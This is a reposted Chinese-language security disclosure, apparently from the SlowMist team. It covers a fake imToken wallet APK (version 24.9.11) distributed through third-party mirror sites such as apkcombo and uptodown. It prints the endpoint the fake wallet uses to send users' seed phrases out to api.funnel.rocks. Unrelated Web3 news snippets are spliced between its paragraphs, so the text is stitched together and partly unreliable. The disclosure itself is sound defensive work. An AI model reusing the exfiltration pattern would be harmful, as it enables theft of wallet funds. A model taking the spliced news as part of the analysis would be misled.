WEB:Web3 假錢包第三方源調查分析：如何甄別網絡釣魚攻擊？_APK幣

慢霧安全團隊建議使用錢包、交易所時請認準官方下載渠道并從多方進行驗證。

原文：https://foresightnews.pro/article/h5Detail/31716

作者：山&耀

轉自：ForesightNews

背景

基于區塊鏈技術的Web3正在驅動下一代技術革命，越來越多的人開始參與到這場加密浪潮中，但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林，身處Web3世界中，錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中，你會發現在一條公鏈上每個應用都是使用錢包「登錄」；這與我們傳統意義上的「登錄」不同，在Web2世界中，每個應用之間的賬戶不全是互通的。但在Web3的世界中，所有應用都是統一使用錢包去進行「登錄」，我們可以看到「登錄」錢包時顯示的不是「LoginwithWallet」，取而代之的是「ConnectWallet」。而錢包是你在Web3世界中的唯一通行證。

Way Network已完成IMTP開發，可為Web3應用提供廣義跨鏈通信:1月20日消息，基于零知識證明的全鏈互操作協議Way Network已完成子協議IMTP的開發。Way Network除了能做zkBridge用于資產跨鏈之外，還能為Web3應用提供安全而快速的廣義跨鏈通信。

Way的子協議Interchain Message Transmission Protocol （IMTP）是一種由zkSpark進行證明的鏈間信息傳輸方案，用于為DeFi dApp提供鏈上倉位預警、消息通知，為社交dApp提供鏈上Direct Message，為鏈上郵箱或鏈上簽字dApp提供低延遲通信。[2023/1/20 11:22:43]

俗話說高樓之下必有陰影，在如此火熱的Web3世界里，錢包作為入口級應用，自然也被黑灰產業鏈盯上。

耐克旗下潮牌RTFKT將推出首款Web3智能運動鞋，支持Move to Earn功能:12月6日消息，耐克旗下加密時尚潮牌RTFKT宣布，將推出首款原生Web3智能運動鞋Crypto kicksi RL。支持自動系帶、觸覺反饋、增強照明、手勢控制、步行檢測、無線充電、WMNFC鏈接、應用程序連接、AI/ML算法等功能。

RTFKT稱此款運動鞋將啟用Move to Earn（邊跑邊賺）模式，但未透露有關該模式的具體規則。運動鞋限量19,000雙，有4種配色可選，分別是Blackout、Stone、Ice和SpaceMatter。在鑄造過程中，它們將作為數字收藏品(NFT)出售，以兌換實物對應物（鞋子不防水）。鑄造者將收到一雙Crypto kicksi RL運動鞋作為數字資產(NFT)和一雙實物運動鞋，RTFKT的WM芯片可將數字和實物物品聯系起來。[2022/12/6 21:25:42]

在Android環境下，由于很多手機不支持GooglePlay或者因為網絡問題，很多人會從其他途徑下載GooglePlay的應用，比如：apkcombo、apkpure等第三方下載站，這些站點往往標榜自己App是從GooglePlay鏡像下載的，但是其真實安全性如何呢？

演員羅賓·威廉姆斯的兒子正在建立專注于心理健康的Web3社區:2月19日消息，已故演員羅賓·威廉姆斯（Robin Williams）的兒子扎克·威廉姆斯（Zak Williams）正在與NFT藝術家合作，為一家心理健康慈善機構籌集資金。威廉姆斯表示，他希望建立一個\"專注于心理健康的Web3社區\"。

Zak Williams于去年11月在洛杉磯通過朋友認識了NFT藝術家耶穌·馬丁內斯（Jesus Martinez），兩人一拍即合。Martinez在接受The Block采訪時表示，“我們因父親的故事而結緣。我們都看到了各自父親在心理健康方面的掙扎，我們有著相似的童年。”Zak Williams補充道，“我們從開發的早期階段開始的是一個社區，它將是一個專注于心理健康的Web3社區，特別關注藝術家和創意人員的心理健康。”

據悉，威廉姆斯是一家銷售咀嚼膳食補充劑的公司的創始人兼首席執行官，還是幾家公司的活躍投資者，并且是一個名為Bring Change to Mind的非營利組織的董事會成員，該組織專注于心理健康相關問題。馬丁內斯是一位NFT藝術家，指導洛杉磯地區其他想要進入加密貨幣領域的藝術家。去年夏天，他創作的一部超現實主義的動畫風景片在OpenSea上以38000美元的價格售出。（The Block）[2022/2/19 10:02:08]

網站分析

2021年Web3開發者報告：每月有18,000多名活躍開發人員在開源加密和Web3項目中提交代碼:官方消息，Electric Capital發布2021年Web3開發者報告，對近50萬個代碼存儲庫和1.6億個代碼提交進行了識別。報告指出：

1. 每月有18,000多名活躍開發人員在開源加密和Web3項目中提交代碼；

2. 2021年有34,000多名新開發人員提交了代碼，創歷史新高；

3. 每月有4,000多名活躍的開源開發人員在以太坊上工作，680多名開源開發人員在比特幣上工作；

4. 超過20%的新 Web3 開發人員加入了以太坊生態系統；

5. Web3中65%的活躍開發人員在2021年加入；45%的Web3全職開發人員在2021年加入；

6. 2,500多名開發人員正在從事DeFi項目。[2022/1/6 8:29:29]

鑒于下載途徑眾多，我們今天以apkcombo為例看看，apkcombo是一個第三方應用市場，它提供的應用據官方說大部分來源于其他正規應用商店，但事實是否真如官方所說呢？

Cloudflare通過集成ENS和IPFS推出通往分布式Web的網關:金色財經報道，互聯網托管巨頭Cloudflare推出了一個新的直接網關以支持分布式Web。根據周三的博客文章，Cloudflare將能夠通過新的索引服務連接到在以太坊名稱服務（ENS）和星際文件系統（IPFS）上托管的域。[2021/1/14 16:07:00]

我們先看下apkcombo的流量有多大：

據數據統計站點similarweb統計，apkcombo站點：

全球排名：1,809國家排名：7,370品類排名：168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件，我們發現這款插件的用戶數達到了10W：

那么回到我們關注的Web3領域中錢包方向，用戶如果從這里下載的錢包應用安全性如何？我們拿知名的imToken錢包為例，其GooglePlay的正規下載途徑為：https://play.google.com/store/apps/details?id=im.token.app

由于很多手機不支持GooglePlay或者因為網絡問題，很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為：https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現，apkcombo提供的版本為24.9.11，經由imToken確認后，這是一個并不存在的版本！證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3，此款錢包的版本號很高，顯然是為了偽裝成一個最新版本而設置的。

如下圖，我們在apkcombo上發現，此假錢包版本顯示下載量較大，此處的下載量應該是爬取的GooglePlay的下載量信息，安全起見，我們覺得有必要披露這個惡意App的來源，防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如：uptodown下載地址：https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App，這導致釣魚的成本變得極低：

錢包分析

在之前我們已經分析過不少假錢包的案例，如：2021-11-24我們披露：《慢霧：假錢包App已致上萬人被盜，損失高達十三億美元》，所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析，在開始界面創建錢包或導入錢包助記詞時，虛假錢包會將助記詞等信息發送到釣魚網站的服務端去，如下圖：

根據逆向APK代碼和實際分析流量包發現，助記詞發送方式：

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖，最早的「api.funnel.rocks」證書出現在2022-06-03，也就是攻擊開始的大概時間：

俗話說一圖勝千言，最后我們畫一個流程圖：

總結

目前這種騙局活動不僅活躍，甚至有擴大范圍的趨勢，每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節，應時刻保持懷疑之心，增強安全意識與風險意識，當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證；如果你的錢包從上述鏡像站下載，請第一時間轉移資產并卸載該軟件，必要時可通過官方驗證通道核實。

同時，如需使用錢包，請務必認準以下主流錢包App官方網址：

imToken錢包：https://token.im/TokenPocket錢包：https://www.tokenpocket.pro/TronLink錢包：https://www.tronlink.org/比特派錢包：https://bitpie.com/MetaMask錢包：https://metamask.io/TrustWallet：https://trustwallet.com/請持續關注慢霧安全團隊，更多Web3安全風險分析與告警正在路上。

致謝：感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性，本文只是冰山一角。慢霧在此建議，用戶需加強對安全知識的了解，進一步強化甄別網絡釣魚攻擊的能力等，避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

?

Tags：WEBWEB3COMAPKweb3域名有什么用web3幣有哪些MyPoints E-CommerceAPK幣

抹茶交易所